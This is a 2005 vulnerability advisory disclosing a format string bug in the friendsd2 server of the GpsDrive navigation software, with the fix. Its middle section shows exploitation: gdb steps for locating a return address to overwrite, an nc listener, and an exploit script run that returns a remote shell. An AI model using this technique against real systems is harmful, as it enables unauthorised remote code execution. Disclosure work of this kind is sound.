The friendsd server that comes with GpsDrive contains an obvious format string issue compliments of a bad fprintf() call.
ec70d84c5f0cca691f8ba58bee71f8d6fe7cc9f04578b31c5892e4614ff209f0
DMA[2005-1104a] - 'GpsDrive friendsd2 format string vulnerability'
Author: Kevin Finisterre
Vendor: https://www.gpsdrive.cc/
Product: 'GpsDrive'
References: https://www.digitalmunition.com/DMA[2005-1104a].txt
Description:
GpsDrive is a car (bike, ship, plane) navigation system. It can display positioning information
provided from a NMEA capable GPS receiver on a zoomable map. Map file autoselecting is done based
on the current position and the prefered map scale. All Garmin GPS reveivers with a serial output
should be usable, as well as other GPS receivers that support NMEA protocol. GpsDrive was written
in C with use of the GTK+ graphic toolkit and it runs on Linux and FreeBSD. With minimal work it
is also posisble to run GpsDrive on Windows and on OSX.
GpsDrive comes with a server program called friendsd which acts as server for the position of your
friends. You see the position of your friends as a car symbol on the map, including the name, time,
day of week and the speed of his last connection. A blue arrow shows the last reported direction of
your friend. Fritz Ganter has blatantly stated in the man page that "The (friendsd) server was NOT
tested for security".
Please not that friendsd no longer runs as root since the last round of security patches.
kfinisterre:/home/kfinisterre# friendsd2
server: please don't run me as root
The friendsd server does contain an obvious format string issue complements of a bad fprintf() call.
./src/friendsd.c:367: fprintf (stderr, txt);
Exploitation of this bug is fairly trivial, on powerpc I chose to overwrite a saved return address
as shown below.
First I just crashed the program and went to frame 2
0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
(gdb) bt
#0 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
#1 0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6
#2 0x0f6825d0 in fprintf () from /lib/tls/libc.so.6
#3 0x100024b8 in dg_echo ()
#4 0x10002f28 in main ()
Next I grab the address of Arglist for frame 2 and overwrite that +4
(gdb) i f
Stack level 2, frame at 0x7fffad70:
pc = 0xf6825d0 in fprintf; saved pc 0x100024b8
called by frame at 0x7fffae00, caller of frame at 0x7fff8700
Arglist at 0x7fffad70, args:
Locals at 0x7fffad70, Previous frame's sp in r1
(gdb) x/a 0x7fffad70+4
0x7fffad74: 0xf6825d0 <fprintf+112> (overwrite this)
animosity:/home/kfinisterre$ nc -l -p 31337 -vvv
listening on [any] 31337 ...
animosity:/home/kfinisterre$ ./gpsdrive-ex-long-ppc.pl
$VAR1 = {};
192.168.1.1: inverse host lookup failed: Unknown host
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349
id;
uid=1000(kfinisterre) gid=1000(kfinisterre)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)
Workaround:
Stop using friendsd2! or simply change the above mentioned fprintf() call to the following.
fprintf (stderr,"%s",txt);
Timeline associated with this bug:
I emailed Fritz Ganter (ganter@ganter.at) at least twice about this and got no response.
-KF